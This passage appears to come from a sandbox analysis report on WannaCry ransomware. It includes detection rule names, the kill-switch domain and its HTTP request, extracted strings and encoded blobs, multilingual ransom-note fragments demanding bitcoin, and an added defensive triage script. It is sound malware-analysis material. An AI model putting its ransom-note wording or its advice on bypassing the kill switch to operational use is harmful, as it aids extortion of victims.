  ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4   SID 2024301
  ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5   SID 2024302
  WannaCry Kill-Switch Check                                           SID 181710202
ET rules applied using Suricata.

Extracted Strings
All Strings: 2684; Interesting: 1522. Count by source:
  2a8efbfadd798f6111340f7c1c956bee.dll.bin (1088), PCAP (1), TWR5WB11.txt (8), attrib.exe:2344 (3), attrib.exe:3372 (1), attrib.exe:3744 (1), icacls.exe:2672 (6), icacls.exe:2972 (1), icacls.exe:3732 (2), m_chinese (simplified).wnry (136), m_chinese (traditional).wnry (190), m_filipino.wnry (55), m_finnish.wnry (40), m_french.wnry (37), m_indonesian.wnry (35), m_polish.wnry (44), m_portuguese.wnry (189), m_romanian.wnry (97), m_russian.wnry (75), m_spanish.wnry (32), m_swedish.wnry (39), m_vietnamese.wnry (260), mssecsvc.exe (1), mssecsvc.exe:2368 (72), mssecsvc.exe:2376 (221), network.pcap (6), rundll32.exe (1), rundll32.exe:2388 (26), screen_0.png (6), tasksche.exe:2136 (5), tasksche.exe:736 (6)

Strings, in the report's order (backslashes un-doubled and CSV-style doubled quotes repaired):
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
   (C runtime character-class and lowercase-mapping tables; they appear in most MSVC-built binaries and are not specific to this sample)
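The Contacted Hosts, HTTP Traffic and Suricata sections above are the two pieces of network evidence a triage script should pull out of a report like this: one process fanning out to hundreds of unrelated addresses, and a single HTTP request to a known kill-switch domain. The script below is an added example, not code from the report or from any sandbox vendor. Its inputs are constructed: the host rows copy six records from the table above in the report's own flattened layout (the flag alt-text repeats each country name, which the regex uses as a delimiter), the HTTP request copies the report's HTTP Traffic row, and the scanning thresholds are this example's assumptions. The observation that the Port column only ever increases is also checked; that pattern is what sequential ephemeral source ports look like, so confirm from the pcap which end of the connection the column describes before treating it as a service port.

```python
"""Triage of a sandbox report's network sections: per-process connection
fan-out from the contacted-hosts table, and the kill-switch HTTP check.

Added example, not code from the report or from any sandbox vendor.
Inputs are constructed copies of rows shown in the report (see lead-in).
"""
import re
from collections import defaultdict
from typing import Optional

# One record of the flattened table: "<ip> <port> <proto> <process> PID: <pid>
# Flag of <country> <country>". The back-reference (?P=country) consumes the
# repeated country name that the flag alt-text produces.
HOST_RE = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<proc>\S+)\s+PID:\s*(?P<pid>\d+)\s+Flag of (?P<country>.+?) (?P=country)(?=\s|$)"
)

# Constructed sample: six rows copied from the report's table, in the report's
# layout. The Taiwan row exercises a country name containing punctuation.
CONTACTED_HOSTS_RAW = (
    "180.68.219.14 64919 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of "
    "135.189.234.238 64920 TCP mssecsvc.exe PID: 2368 Flag of United States United States "
    "84.141.186.180 64921 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany "
    "26.110.139.217 64988 TCP mssecsvc.exe PID: 2368 Flag of United States United States "
    "9.187.106.209 64999 TCP mssecsvc.exe PID: 2368 Flag of United States United States "
    "115.43.174.21 65029 TCP mssecsvc.exe PID: 2368 "
    "Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC)"
)

# Copied from the report's HTTP Traffic row (request line and headers are run
# together on one line in the report).
HTTP_REQUEST_RAW = ("GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com "
                    "Cache-Control: no-cache")

# The domain WannaCry's dropper tests before doing anything else.
KILL_SWITCH_DOMAINS = {"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"}


def parse_contacted_hosts(raw: str) -> list:
    """Split the flattened table text back into one dict per row."""
    return [m.groupdict() for m in HOST_RE.finditer(raw)]


def fanout_by_process(rows) -> dict:
    """Per (process, pid): distinct destinations, how many /8 blocks they span,
    and whether the Port column increases monotonically down the table."""
    by_proc = defaultdict(list)
    for r in rows:
        by_proc[(r["proc"], r["pid"])].append(r)
    stats = {}
    for key, recs in by_proc.items():
        ips = {r["ip"] for r in recs}
        ports = [int(r["port"]) for r in recs]
        stats[key] = {
            "unique_ips": len(ips),
            "distinct_first_octets": len({ip.split(".")[0] for ip in ips}),
            "ports_strictly_increasing": all(a < b for a, b in zip(ports, ports[1:])),
        }
    return stats


def looks_like_scanner(stat: dict, min_ips: int = 5, min_first_octets: int = 4) -> bool:
    """Heuristic (thresholds are this example's assumption): one process
    touching many distinct hosts scattered across many /8s is worm-style
    scanning, not application traffic."""
    return stat["unique_ips"] >= min_ips and stat["distinct_first_octets"] >= min_first_octets


REQ_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/(?P<version>\d\.\d)\s*(?P<headers>.*)$", re.S)
# A header value runs until the next "Name:" token or the end of the text.
HDR_RE = re.compile(r"(?P<name>[A-Za-z][A-Za-z0-9-]*):\s*(?P<value>.*?)(?=\s+[A-Za-z][A-Za-z0-9-]*:\s|$)", re.S)


def parse_http_request(raw: str) -> dict:
    """Parse the flattened request text into method, path, version and headers."""
    m = REQ_RE.match(raw.strip())
    if not m:
        raise ValueError("not an HTTP request line: %r" % raw)
    headers = {h.group("name"): h.group("value").strip() for h in HDR_RE.finditer(m.group("headers"))}
    return {"method": m.group("method"), "path": m.group("path"),
            "version": m.group("version"), "headers": headers}


def kill_switch_verdict(request: dict, status_line: Optional[str]) -> str:
    """The dropper only tests whether the URL can be opened: any HTTP answer
    (here "200 OK" from the sinkhole) makes that process exit, while a DNS or
    connect failure lets it continue. status_line=None models "no response"."""
    host = request["headers"].get("Host", "").lower()
    if host not in KILL_SWITCH_DOMAINS:
        return "not a kill-switch request"
    if status_line is None:
        return "kill switch unreachable: this process continues"
    return "kill switch reachable (%s): this process exits" % status_line


if __name__ == "__main__":
    rows = parse_contacted_hosts(CONTACTED_HOSTS_RAW)
    for key, stat in fanout_by_process(rows).items():
        print(key, stat, "SCANNER" if looks_like_scanner(stat) else "")
    req = parse_http_request(HTTP_REQUEST_RAW)
    print(req["headers"]["Host"], "->", kill_switch_verdict(req, "200 OK"))
```

Two caveats when reading the report with this in hand. The kill-switch check gates only the process that performed it, and this report shows both a 200 OK for the domain and hundreds of outbound connections from mssecsvc.exe in the same run; with two mssecsvc.exe processes listed (2368 and 2376), check in the pcap which process issued each request and whether its connection completed before the scanning started. And because a reachable kill-switch domain stops the dropper, an analyst who wants to observe the propagation and encryption stages has to run the sample without a route to that domain.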
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
   (C runtime uppercase-mapping table, companion to the two tables above)
((((( H ) u(}}M5 )A7u3P=h ,
trimite}{\rtlch\fcs1 \af2 \ltrch\fcs0 \f31502\fs22\insrsid8458214\charrsid12743656 \loch\af31502\dbch\af31505\hich\f31502 c1\
   ("trimite" is Romanian for "send"; the rest is RTF run formatting from a ransom-note .wnry file)
\af2 \ltrch\fcs0 \f31528\fs22\insrsid8458214\charrsid12743656 \hich\af31528\dbch\af31505\loch\f31528
.?AVtype_info@@
   (MSVC RTTI type descriptor name)
.rEgvWM.
.rEgvWM.-
033-
Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
   (standard MSVC runtime error text)
17514 (win7sp1_rtm.101119-1850)
17PxLJqFBStliNmz0gAc//7PJr4JVXRAuALHUN59w5erW2THQGk2WfFLx3kGSb1RT3ftd8JXsL3+6ghXGLnXrhwg1xCP0O5AbGekemZwwlYUWrKLdGqR8ymemAbSOTvv3hu6Z6M5lyByGu/FjXviSrJNW64Soz5pQ976WnI6evPstE8t0PCfFZx5bLOVfQl5oFdtVRnzdGzQJRXTs3Nl65Azy/oxgZ8Fc74Me7/ddLt6Tk65fBLmqR15G3Wxwzb+dEcCR9RwjWrDv/A4tMlLEzNlj2EzHL95aUfVDXpDqm/YkwDrVqeMEzCVBngxV+9+AoDbrfeL8qLbtA3A/TX1ieYYP9sAkImWhd6w0dYSwj0W8oioWo42myG3J46m9auC0tjmhGt+bTan1IVhSdRbha2tuqS3a741NUNhhna41dnwTad4LFrGq60ZpnzX5qADOmhTuDGJa5lBho/tf29R/RjtkU3/dHpPBBNjDwYHnYPS+zQfk2mWelIXY+JkubNKuSsf2N5fwjLBkFgDS03HlH/hqr770BcGnFqMpkHvuonPL4A1QE0tE6fMwuxsAPKryLzAxH6gGVwZL3GjTFFM0m5h7afaV1/h1N+N6+A73a9qNWAyseX48Z83l1tyCpkgePI3mBzEVyI+ciDLRCZIaOAVgnFEzs0A5+s9qIlF71Wv0uGQGDUjvEfJzSdSRo0SYETcjM0t4gl3NTAX8n4drVAjATOT56W2PhR+X9iWM95If96kDqmazlG9dkooZmv+VCyYE6PPmNriCuJ3wVbCWFfnEAEa4p526tWqjyAtr74bBpofzAc1n4K5TCcjG/TPNhlbrEtYtBwyU+v60dnc+ydZ25qvsCKzgfM9bwldMC7IkXCRy2mcqwbLOtIslmm41ILFfZJ3p1fyZEG39w2bhppQjcOlMVXQ9ZQ2eeDkjdNfvlvCHKPh11OAiv2HPveYtmgQu+egwviHkts9kcULkex4u4NpEj5J4LoY84zDFqV4I/MkwIv/FnTOioOwVALr
   (base64-looking blob; not decoded here)
2/O-_.X8w.+
22YAffbkMtZyUSe9zq4Qa2s6cfxQtp+MUTd+WHLbm+nHOxX8WdP2vwfULRmXdOCFWtOXqNhxPxY1F9rIpEyfg6MVepyqn8QmJo+LHMHDZj7MZpvXuLrgX8lPIrpvrU7viCf4T/wwEZNyVWyLs2UUWe93cLPUU9S0DcsNUlFH5evrsj3lVXXMiEPVzVECa6ugpv9qcnq0tbHAMxTbcB14jvyDLL7yPTQ0pFCW1TkpQrYhACCh11HuTyS3NdXlQ+lUyWFOutUxi9NzaCqsRcl6J789h2y39JwpvXzYUdZKFSSP7gAbUqWFnXe/0168TpB2LdoHagxK6D20YfKOIr6tHhckA6RJGfmQxv9vUltqxuFZaJlausy9JcgA1Lu
   (base64-looking blob; not decoded here)
6.1.7601.17514 (win7sp1_rtm.101119-1850)
   (Windows 7 SP1 build tag; with "17514 (win7sp1_rtm.101119-1850)" above, most likely read from system modules loaded in the process rather than from the sample itself)
7G8nXS/iAjqcsxzmmP6z8CzN1th5P5xMtLvct8uvBK0+RYApTjXZ05Jm/Y3QXAs2xPrT0zv76dx+qLAfa7vC4ZH6KUbkSZLZomHg5e1SHinswmpTbZamf8HlPgyt2OjqN5DOF3mqBg/Xzk1Qxo0y5LoCrCvFA5SDuIcvRmbjbJ3sj3yIfDl5Qe1np/fmhssM6Hk3+TWOSCmLs+BN/qTAhXHu3UZAQi4h/XOQPM3Mxj19S3XFonCmDBY12MFmYFopeKb+A9cbZ7sS2v4t9pEdsRpweSB3qoFxDekJtPSflugazyWKlhKRQk3HJBaj3tlf6XyiBNQiQi7fKbju97jNZZmQIK5QPvPsdrh5vZtVT7A0/padnNrBUR1pOp6fAZERDoBYRdD5bLVVEnf6A0HiVNpnsod8Yu2HUAbVNEEx4jRJulnWSJagt4uuKhelScrQZ7B7GizgSTZNrpMrMas2MGIRDL/6G9PLEicbqX4wcTgiX7IY1eMwzvfJmz11lgoqdH09ydJTdH1OWY+iLZY83r5clvtdlA1cTqwtOjaF+sG+6yrNo22im3v/kOL7pyyv9ca4aALuTtvKWraApKYnkT3lqUByqOSCtfqTfHl/Oc4dKnNj3JNCdaAcCyEvJrSLNM0+x1ZOeHIKfoES6Cg4Hnchs5yd0JoHkjKSDOZ5Q4AZu39qH29hxHUOow4+IJxoV98XTbVU3xeBLHVnq4Iqi+9T9M/85W65IdWPio7zvsIWPX2WfuK+YlSr7gr3rkHsjDMVUa2W+Cm9g7kFJfwMHriymhe2SKwad0AYKE4BHqfts+VTXhfAJjjsF9rYe1zTlqGCcjp9rObr4xHSWB7bHI
   (base64-looking blob; not decoded here)

RTF document structure from the ransom-note files (the m_*.wnry files are RTF documents, so the extractor picked up their control words):
  8*))c0}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb \hich (}
  colour tables: \red128\green0\blue128;\red128\green0\blue0;\red128\green128\blue0;\red128\green128\blue128;\red192\green192\blue192;}
                 \red255\green255\blue255;\red0\green0\blue128;\red0\green128\blue128;\red0\green128\blue0;\red128\green0\blue128;\red128\green0\blue0;\red128\green128\blue0;\red128\green128\blue128;\red192\green192\blue192;\red5\green99\blue193;}
  defaults: {\*\defchp \fs22\loch\af31506\hich\af31506\dbch\af31505 }{\*\defpap \ql \li0\ri0\sa200\sl276\slmult1
  revision ids: \rsid7998057\rsid8592923\rsid8656048\rsid10768528\rsid13911538\rsid14237745\rsid14432744\rsid16127139\rsid16253913\rsid16278914}
  math defaults: {\mmathPr\mmathFont34\mbrkBin0\mbrkBinSub0\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1
  compatibility flags: senormstyforlist\noindnmbrts\felnbrelev\nocxsptable\indrlsweleven\noafcnsttbl\afelev\ \nouicompat \fet0{\*\wgrffmtfilter 2450}
  character-run headers, repeated dozens of times with only the font, size and rsid values changing, for example:
    \rtlch\fcs1 \af12\afs22 \ltrch\fcs0 \b\fs28\lang1033\langfe1028\loch\af11\hich\af11\dbch\af11\langfenp1028\insrsid1060393\charrsid1060393 \loch\af11\hich\af11\dbch\f11
    \rtlch\fcs1 \af2 \ltrch\fcs0 \b\f31502\fs28\insrsid14315351\charrsid3475210 \hich\af31502\dbch\af31505\loch\f31502
    \rtlch\fcs1 \af2 \ltrch\fcs0 \f31502\fs22\cf6\insrsid14315351\charrsid3475210 \hich\af31502\dbch\af31505\loch\f31502
    \rtlch\fcs1 \af2 \ltrch\fcs0 \f31502\fs22\insrsid14315351\charrsid3475210 \hich\af31502\dbch\af31505\loch\f31502
    \rtlch\fcs1 \af2 \ltrch\fcs0 \f31502\fs22\insrsid8458214\charrsid12743656 \hich\af31502\dbch\af31505\loch\f31502
  The recurring "c1\" fragments between these headers are apparently the tails of \uc1 control words whose "\u" prefix the extractor dropped; the same stripping turns \uN Unicode escapes into bare decimal numbers (see the Chinese fragments below).

Named kernel objects found in process memory (console-session ALPC ports):
\RPC Control\ConsoleLPC-0x000003BC-1333190300-13617924804819246357277348371021377984-952191596-1739269460-1455666328
\RPC Control\ConsoleLPC-0x00000994-1569971644598623547-530927353-1307907937824986770580215670695456530-1219771019
\RPC Control\ConsoleLPC-0x0000099C-9905856621666734106306486637-856033773-118775333815623337391005617996-1411360878
\RPC Control\ConsoleLPC-0x00000B34-241091258-10632443371550682790139018111216207573321532242973-15434746261325724320
\RPC Control\ConsoleLPC-0x00000D10--464568733-1459533581-633833832-1700943488-167131137-159572379113173873865730003
\RPC Control\ConsoleLPC-0x00000E8C--2121949365-1630700945947335501000294222-199221424210996338082031076023-577769686

Fragments of ransom-note text surviving between the RTF run headers (translations added in brackets):
  Traditional Chinese (\langfe1028 runs, m_chinese (traditional).wnry), as decimal Unicode code points each followed by a two-byte code-page fallback escape:
    20184\'95\'74 [付, "pay"], 26377\'97\'4c [有, "have"], 25105\'89\'e4 [我, "I"], 20449\'ab\'48 [信, "letter"], 19968\'88\'ea [一, "one"], 22294\'9a\'a4 [圖, "picture"], 24536\'96\'59 [忘, "forget"], 26371\'98\'f0 [會, "will"]
  Vietnamese (m_vietnamese.wnry; \'xx are Windows-1258 bytes, e.g. \'e0 = à, \'fa = ú, \'f4 = ô, \'e1 = á, \'ed = í, \'e3 = ã):
    p x\'fa c ["(tiế)p xúc", contact]; m n\'e0 y v\'e0 v\'f4 hi ["...m này và vô hi(ệu)", "this and disable"]; gi\'fa p c ["giúp c...", help]; kh\'f4 i ph ["khôi ph(ục)", restore]; a Bitcoin v\'e0 mua m ["...Bitcoin và mua m(ột)...", "Bitcoin and buy"]; a ch\'fa ng t\'f4 i. ["(củ)a chúng tôi.", "of ours"]; i. Ch\'fa ng t\'f4 ["Chúng tô(i)", "We"]; m tra: 9:00 s\'e1 ng - 11:00 s\'e1 ng GMT t ["(kiể)m tra: 9:00 sáng - 11:00 sáng GMT t(ừ)", "check: 9:00 am - 11:00 am GMT from"]; n ph\'ed . H\'e3 y th ["(miễ)n phí. Hãy th(ử)", "free. Try"]; p v\'e0 o < ["(nhậ)p vào <", "enter into <"]; u v\'e0 c\'e1 c t ["...và các t...", "and the ..."]; i gian. ["(thờ)i gian.", "time."]
    plus single-syllable remnants: n?, ti, b, ph, n m, ki, li, tr, t, a b, n c, n mi, n r, n s, p c, t s, u b, bi, p ti, i c, c ch
  Finnish (m_finnish.wnry):
    >. Paras aika tarkistaa: klo 9.00-11.00 GMT maanantaista perjantaihin. ["Best time to check: 9:00-11:00 GMT, Monday to Friday."]
  Romanian (m_romanian.wnry):
    i fi, i ni, i. [fragments]; ierele importante sunt criptate. ["(fiș)ierele importante sunt criptate", "important files are encrypted."]; ierele pentru totdeauna. ["(fiș)ierele pentru totdeauna", "the files forever."]; te bitcoins. Pentru mai multe informa ["...bitcoins. Pentru mai multe informa(ții)", "bitcoins. For more information"]; ul va fi dublat. ["(prețul) va fi dublat", "will be doubled."]
\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8528114 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 Contact Us}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid12997017\\charrsid8528114 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 >. \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 i thanh to\\'e1\\loch\\f31528 \\hich\\f31528 n. Sau \\'f0\\'f3\\loch\\f31528 \\hich\\f31528 gi\\'e1\\loch\\f31528 s}{\\rtlch\\fcs1 \\af2 \\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 n \\'f0}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 \\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 \\rtlch\\fcs1 \\af53\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 \\rtlch\\fcs1 \\af90\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 \\sbasedon10 \\slink15 \\slocked \\styrsid1838094 Plain Text Char;}}{\\*\\rsidtbl \\rsid1838094\\rsid1847526\\rsid2183709\\rsid6386681\\rsid13717663\\rsid14237745\\rsid14432744\\rsid15144481\\rsid15301782}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1 \\sbasedon10 \\slink15 \\slocked \\styrsid3689921 Plain Text Char;}}{\\*\\rsidtbl 
\\rsid1847526\\rsid2183709\\rsid3689921\\rsid5275506\\rsid14178431\\rsid14237745\\rsid14432744\\rsid15289305}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0 \\Sessions\\1\\Windows\\ApiPort \\snext0 \\sqformat \\spriority0 \\styrsid1847526 Normal;}{\\*\\cs10 \\additive \\ssemihidden \\sunhideused \\spriority1 Default Paragraph Font;}{\\* \\snext11 \\ssemihidden \\sunhideused \\sqformat Normal Table;}{\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af41\\afs21\\alang1025 \\ltrch\\fcs0 \\ThemeApiPort \\ts11\\tsrowd\\trftsWidthB3\\trpaddl108\\trpaddr108\\trpaddfl3\\trpaddft3\\trpaddfb3\\trpaddfr3\\trcbpat1\\trcfpat1\\tblind0\\tblindtype3\\tscellwidthfts0\\tsvertalt\\tsbrdrt\\tsbrdrl\\tsbrdrb\\tsbrdrr\\tsbrdrdgl\\tsbrdrdgr\\tsbrdrh\\tsbrdrv \\ql \\li0\\ri0\\sa200\\sl276\\slmult1 -27273\\'92\\'b7}{\\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 -244\\'81\\'43}{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 -28558\\'e7\\'ad}{\\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 -32515\\'94\\'5c\ \\af36\\afs22 \\ltrch\\fcs0 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\line }{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 19981\\'95\\'73\ \\af36\\afs22 \\ltrch\\fcs0 19981\\'a4\\'a3\ 20063\\'a4\\'5d\ \\af90\\afs22 \\ltrch\\fcs0 20102\\'a4\\'46\ 20123\\'8d\\'b1\ \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 
\\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af12\\afs22 20214\\'8c\\'8f\ \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 20493\\'ad\\'bf\ \\af90\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 21069\\'91\\'4f}{\\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\cf6\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 -244\\'81\\'43}{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 21209\\'96\\'b1}{\\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 -244\\'81\\'43}{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 23433\\'a6\\'77\ \\af90\\afs22 \\ltrch\\fcs0 23494\\'96\\'a7\ \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 23565\\'9b\\'94}{\\rtlch\\fcs1 \\af11\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 c1\ 24163\\'95\\'bc}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 24489\\'95\\'9c\ \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 25214\\'a7\\'e4\ 25991\\'a4\\'e5\ \\af53\\afs22 \\ltrch\\fcs0 \\b\\fs28\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 26377\\'97\\'4c\ \\af41\\afs22 \\ltrch\\fcs0 
\\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 27454\\'8a\\'bc\ \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 -244\\'81\\'43}{ 27602\\'93\\'c5\ \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\cf6\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 32763\\'96\\'7c\ \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 c1\ \\af53\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 c1\ \\af53\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 \\hich\\af18\\dbch\\af18\\loch\\f18 }{\\rtlch\\fcs1 \\af90\\afs22 \\ltrch\\fcs0 c1\ \\af90\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 \\hich\\af18\\dbch\\af18\\loch\\f18 }{\\rtlch\\fcs1 c1\ \\af41\\afs22 c1\ c1\ \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 iere\\hich\\af31502\\dbch\\af31505\\loch\\f31502 le mele? 
c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 ierele, dar nu pierde}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n ngay c}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 n \\'f0}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 i gian, cho \\'f0}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 a b}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c2\ \\af90\\afs22 \\ltrch\\fcs0 c2\ 